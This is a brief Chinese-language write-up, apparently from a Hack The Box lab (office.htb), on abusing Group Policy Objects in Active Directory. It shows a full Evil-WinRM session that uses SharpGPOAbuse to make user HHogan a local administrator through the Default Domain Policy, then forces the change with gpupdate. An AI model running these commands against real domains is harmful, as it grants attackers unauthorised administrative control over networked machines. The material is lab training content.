GPO 的滥用行为
GPO,也就是组策略对象,是 Windows 用来大规模管理计算机的规则。通过 GPO,可以控制 Windows 计算机上的几乎所有设置。
查看所有GPO名称:
Get-GPO -All | Select-Object DisplayName
https://github.com/FSecureLABS/SharpGPOAbuse 该工具专门用于利用 GPO 的漏洞来实施攻击。
*Evil-WinRM* PS C:\programdata> .\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
设置后需要等到 GPO 重新加载后才能生效。如果拥有运行 gpupdate /force 的权限,该设置直接就会生效了。
*Evil-WinRM* PS C:\programdata> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
现在,HHogan属于管理员组了。

浙公网安备 33010602011771号